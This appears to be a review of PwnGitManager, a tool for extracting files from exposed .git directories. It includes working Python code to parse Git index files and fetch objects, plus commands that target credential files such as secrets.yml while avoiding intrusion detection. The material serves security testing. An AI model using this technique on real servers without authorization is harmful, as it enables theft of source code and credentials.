PwnGitManager: Surgical Git Repository Extraction for Security Researchers
Hook
Most Git dumping tools request thousands of objects and trigger every IDS in the building. PwnGitManager downloads a single file, .git/index (typically tens of kilobytes, on the order of a hundred bytes per tracked path), and gives you the entire repository structure.
Context
Exposed .git directories remain one of the most common critical findings in web application security assessments. Developers accidentally deploy their Git metadata to production servers, inadvertently exposing source code, configuration files, API keys, and database credentials. Traditional approaches to exploiting this misconfiguration involve tools like GitTools or git-dumper, which systematically request every object in the repository—sometimes thousands of HTTP requests that light up security monitoring like a Christmas tree.
PwnGitManager takes a different approach born from real-world penetration testing constraints. Instead of dumping everything and sorting through it later, it downloads only Git's index file, the binary database Git uses to track the staging area (the set of paths that will go into the next commit). This single file contains the complete directory structure, the file names, and the SHA-1 blob hash of every tracked file. For security researchers who need specific artifacts (database.yml, .env files, authentication code) rather than complete repository history, this surgical approach reduces request volume by orders of magnitude while delivering faster results.
Technical Insight
At its core, PwnGitManager is a parser for Git's binary index file format combined with a selective object retriever. The index file (.git/index) uses a custom binary format that begins with a 12-byte header: the signature "DIRC", a version number (2, 3 or 4 in current Git) and the entry count, all big-endian. Each entry after the header describes one tracked path: 62 bytes of fixed fields (ctime, mtime, device, inode, mode, uid, gid, file size, the 20-byte SHA-1 of the blob, and a 16-bit flags word whose low 12 bits hold the path length), followed by the NUL-terminated pathname. Entries are sorted by path. In versions 2 and 3 each entry is NUL-padded to a multiple of 8 bytes; version 4 drops the padding and stores each path as a suffix relative to the previous entry, so a parser written only for the padded layout reads garbage on a v4 index. The file ends with a SHA-1 over all preceding bytes, which is a cheap way to confirm the download was neither truncated nor replaced by an error page served with a 200 status.
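To make the layout concrete, here is an added example (not PwnGitManager's own code) that parses the index format just described for versions 2, 3 and 4, verifies the trailing checksum, and matches paths with a glob. Because it has to run offline it also builds a synthetic index from a constructed three-file listing; the blob hashes in that listing are placeholders, not real object IDs.

```python
import hashlib
import os
import struct
from fnmatch import fnmatchcase

# Added example (not PwnGitManager's own code): a minimal .git/index parser.
# Header: "DIRC", version, entry count (big-endian). Entry: 62 bytes of stat
# data + SHA-1 + flags, then the path. v2/v3 NUL-pad entries to 8 bytes;
# v4 prefix-compresses each path against the previous entry instead.
HEADER = struct.Struct(">4sII")
ENTRY = struct.Struct(">10I20sH")   # ctime,ctime_ns,mtime,mtime_ns,dev,ino,mode,uid,gid,size, sha1, flags
EXTENDED = 0x4000                   # v3+: a 2-byte extended-flags word follows


def _read_varint(data, pos):
    """Git's offset-encoded varint (v4 uses it for the prefix-strip length)."""
    byte = data[pos]
    pos += 1
    value = byte & 0x7F
    while byte & 0x80:
        byte = data[pos]
        pos += 1
        value = ((value + 1) << 7) | (byte & 0x7F)
    return value, pos


def _write_varint(value):
    out = bytearray([value & 0x7F])
    value >>= 7
    while value:
        value -= 1
        out.insert(0, 0x80 | (value & 0x7F))
        value >>= 7
    return bytes(out)


def parse_index(data):
    """Return [(path, sha1_hex, size, mode), ...] from raw .git/index bytes."""
    # Last 20 bytes are a SHA-1 over everything before them: a mismatch means
    # a truncated download or a server that returned something else.
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch (truncated or not an index)")
    sig, version, count = HEADER.unpack_from(data, 0)
    if sig != b"DIRC" or version not in (2, 3, 4):
        raise ValueError(f"unsupported index: {sig!r} v{version}")
    pos, prev, entries = HEADER.size, b"", []
    for _ in range(count):
        start = pos
        fields = ENTRY.unpack_from(data, pos)
        pos += ENTRY.size
        mode, size, sha1, flags = fields[6], fields[9], fields[10], fields[11]
        if flags & EXTENDED:
            pos += 2                                   # skip extended flags (v3+)
        if version < 4:
            end = data.index(b"\x00", pos)
            path = data[pos:end]
            pos = start + ((end - start + 1 + 7) & ~7)  # path + NUL, padded to 8
        else:
            strip, pos = _read_varint(data, pos)
            end = data.index(b"\x00", pos)
            path = prev[:len(prev) - strip] + data[pos:end]
            pos = end + 1                              # v4 entries are not padded
        prev = path
        entries.append((path.decode(), sha1.hex(), size, mode))
    return entries


def build_index(entries, version=2):
    """Construct a synthetic index (for offline demos/tests); stat fields are zeroed."""
    body = bytearray(HEADER.pack(b"DIRC", version, len(entries)))
    prev = b""
    for path, sha1_hex, size, mode in sorted(entries):     # Git keeps entries path-sorted
        raw = path.encode()
        fixed = ENTRY.pack(0, 0, 0, 0, 0, 0, mode, 0, 0, size,
                           bytes.fromhex(sha1_hex), min(len(raw), 0xFFF))
        if version < 4:
            entry = fixed + raw + b"\x00"
            entry += b"\x00" * (-len(entry) % 8)
        else:
            common = len(os.path.commonprefix([prev, raw]))
            entry = fixed + _write_varint(len(prev) - common) + raw[common:] + b"\x00"
        body += entry
        prev = raw
    return bytes(body) + hashlib.sha1(body).digest()


def find(entries, pattern):
    """Glob over index paths. Note fnmatch's '*' also crosses '/', so '*.yml' is repo-wide."""
    return [e for e in entries if fnmatchcase(e[0], pattern)]


# Constructed sample listing; the SHA-1 values are placeholders, not real object IDs.
SAMPLE = [
    ("README.md", "aa" * 20, 120, 0o100644),
    ("config/database.yml", "bb" * 20, 2300, 0o100644),
    ("config/secrets.yml", "cc" * 20, 512, 0o100644),
]

if __name__ == "__main__":
    for version in (2, 4):
        for path, sha1, size, _ in parse_index(build_index(SAMPLE, version)):
            print(f"v{version} {sha1[:12]} {size:>6} {path}")
```

Against a live target you would replace build_index with the bytes fetched from https://target/.git/index; the checksum check is worth keeping, since a 200 response carrying an HTML error page is a common way for this kind of tool to fail silently.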
Here's how you'd use PwnGitManager in a typical engagement scenario:
# Command-line mode for scripted reconnaissance
python3 pwngitmanager.py --url https://target.com/.git/ --download "*.yml" --download "*.env"
# Or launch interactive shell for exploration
python3 pwngitmanager.py --url https://target.com/.git/ --interactive
Once in interactive mode, you get a familiar shell-like interface with tab completion:
pwngit> ls
app/
config/
db/
lib/
README.md
pwngit> cd config
pwngit:/config> search database
config/database.yml
config/database.sample.yml
pwngit:/config> get database.yml
[+] Downloaded: config/database.yml (2.3 KB)
The magic happens in how PwnGitManager reconstructs the repository structure. After downloading the index file, it parses the binary format to build an in-memory tree structure. When you request a file, it looks up the corresponding SHA-1 hash from the index and constructs the loose object path: .git/objects/ab/cdef123..., where the first two hex characters become the subdirectory and the remaining 38 form the filename. It then retrieves and zlib-decompresses the object. Two details matter here: the decompressed data begins with a header of the form "blob <size>\0" that has to be stripped before the content is usable, and recomputing SHA-1 over the whole decompressed object (header included) and comparing it with the hash from the index confirms that the download is intact and is really the blob the index referenced.
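The retrieval step, as an added example rather than PwnGitManager's own code: it derives the loose object path from the SHA-1, decompresses the object, strips and validates the "blob <size>\0" header, verifies the hash, and treats a missing object as the "probably packed" failure mode. The HTTP layer is injected as a fetch function so the example runs offline against a constructed in-memory .git/ directory; the hypothetical fake_fetch stands in for a real requests.get against the target.

```python
import hashlib
import zlib

# Added example (not PwnGitManager's own code): locate, decompress and verify
# one loose object given the SHA-1 taken from the index.


def object_path(sha1_hex):
    """Loose object location: first two hex chars are the fan-out directory."""
    return f"objects/{sha1_hex[:2]}/{sha1_hex[2:]}"


def hash_object(kind, content):
    """Git object ID: SHA-1 over '<type> <size>\\0<content>'."""
    return hashlib.sha1(f"{kind} {len(content)}\0".encode() + content).hexdigest()


def make_loose_object(kind, content):
    """On-disk form of a loose object (zlib over header + content); used for the demo server."""
    return zlib.compress(f"{kind} {len(content)}\0".encode() + content)


class PackedRepository(Exception):
    """The index references an object that is not served loose: most likely it lives in a pack."""


def fetch_blob(fetch, sha1_hex):
    """fetch(relative_path) -> bytes, or None for a 404. Returns verified file content."""
    raw = fetch(object_path(sha1_hex))
    if raw is None:
        raise PackedRepository(f"{sha1_hex} is not a loose object; "
                               "repository is probably packed (or the index is stale)")
    data = zlib.decompress(raw)
    header, _, content = data.partition(b"\x00")
    kind, _, size = header.decode().partition(" ")
    # Index entries with mode 160000 are submodule gitlinks whose hash is a commit,
    # not a blob; refuse anything that is not a blob rather than writing it to disk.
    if kind != "blob":
        raise ValueError(f"expected a blob, got {kind!r}")
    if int(size) != len(content):
        raise ValueError("object header size does not match payload length")
    # Recompute the ID over header + content: a mismatch means a corrupt download
    # or an object that is not the one the index pointed at.
    if hashlib.sha1(data).hexdigest() != sha1_hex:
        raise ValueError("object hash mismatch")
    return content


# Constructed fake .git/ directory served from memory (hypothetical target data).
# Only SECRET is available loose; PACKED_ID is referenced by the index but not served.
SECRET = b"production:\n  password: hunter2\n"
SECRET_ID = hash_object("blob", SECRET)
PACKED_ID = hash_object("blob", b"only available inside a packfile")
FAKE_GIT = {object_path(SECRET_ID): make_loose_object("blob", SECRET)}


def fake_fetch(path):
    """Stand-in for an HTTP GET of https://target/.git/<path>; None models a 404."""
    return FAKE_GIT.get(path)


if __name__ == "__main__":
    print(fetch_blob(fake_fetch, SECRET_ID).decode())
    try:
        fetch_blob(fake_fetch, PACKED_ID)
    except PackedRepository as exc:
        print("[-]", exc)
```

With a real target, fetch would be something like a function that does requests.get(base_url + path) and returns the body on 200 and None on 404; everything else stays the same. The hash check is cheap and catches the case where a WAF or CDN substitutes a response body while keeping the status code.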
The tool's architecture separates concerns cleanly: a GitIndex class handles binary parsing, a FileTree class manages the directory structure and supports glob pattern matching, and a Downloader class handles HTTP operations with proxy support. This separation makes it trivial to extend—the included Telegram bot interface demonstrates this by wrapping the core functionality in a chat interface:
# Telegram bot allows remote operation during engagements
python3 telegram_bot.py --token YOUR_BOT_TOKEN
# Then from Telegram:
/start https://target.com/.git/
/ls
/search password
/get config/secrets.yml
For large repositories, the selective extraction capabilities become critical. Traditional dumpers might download 500MB of Git history when you only need three configuration files totaling 15KB. PwnGitManager's search and pattern matching let you pinpoint exactly what matters:
pwngit> search -r "api.*key"
app/services/stripe_api_key.rb
config/initializers/api_keys.rb
lib/third_party/api_key_validator.rb
pwngit> download "config/**/*.yml"
[+] Downloading 12 matching files...
[+] Downloaded: config/database.yml
[+] Downloaded: config/secrets.yml
[+] Downloaded: config/environments/production.yml
...
The implementation avoids Git's pack file format, which bundles many objects into a single .pack archive with delta compression (plus a companion .idx for lookups). This is both a limitation and a design choice: pack support needs substantially more logic (index lookup, delta resolution, and often fetching a multi-megabyte pack to recover one small blob). The trade-off pays off on hosts where commits are made locally, because objects written by git add and git commit stay loose until git gc or Git's automatic garbage collection packs them. It pays off much less on a deployment produced by git clone, which arrives with everything in a single pack; only later fetches small enough to fall under fetch.unpackLimit (100 objects by default) are written as loose objects.
Gotcha
PwnGitManager's minimalist approach comes with practical limitations that matter in certain scenarios. The most significant is the lack of SOCKS5 proxy support—it only handles HTTP/HTTPS proxies. During internal penetration tests where you've compromised an initial host and need to pivot through it to reach the target web application, you'll typically have a SOCKS proxy via SSH tunneling or Metasploit. The HTTP-only proxy support means you'll need to set up additional tooling (proxychains, redsocks) to bridge this gap, adding operational friction.
The tool also doesn't handle Git pack files, which become relevant when a repository has been garbage collected, was deployed with git clone, or is simply old enough that automatic gc has run. When Git packs objects, it moves them from individual files under .git/objects/ into compressed .pack files with delta compression. If your target repository has been packed, PwnGitManager will successfully parse the index and show you all the files, but downloads will fail with 404 errors. You'll see the tantalizing file listing but won't be able to retrieve anything. A quick check before committing to this tool: request .git/objects/info/packs (present when update-server-info has been run) or, where directory listings are enabled, .git/objects/pack/; a large pack and a nearly empty set of loose objects means you need a dumper that understands packs. In practice, recently active repositories where developers commit on the host often still have loose objects, but be ready to fall back to a more comprehensive tool like git-dumper. The single-threaded download implementation also means bulk extraction can be slow compared to tools that parallelize requests. Finally, the Telegram bot is convenient, but every file it retrieves transits Telegram's servers and anyone holding the bot token can drive the tool; confirm that the rules of engagement allow client data to leave your own infrastructure before using it.
Verdict
Use if: You're conducting penetration tests or bug bounties where stealth matters, need to quickly extract specific files from exposed Git repositories (credentials, configs, source code for vulnerability analysis), or are working within tight time constraints where downloading entire repositories would be inefficient. The Telegram bot interface is particularly valuable for red team operations requiring remote coordination.
Skip if: You need complete repository history with all commits for forensic analysis, are working through SOCKS proxies without the ability to add HTTP proxy translation layers, encounter packed repositories, or need maximum speed for bulk extraction where the request volume isn't a concern. For those cases, git-dumper or GitHack provide more comprehensive functionality despite their noisier operation.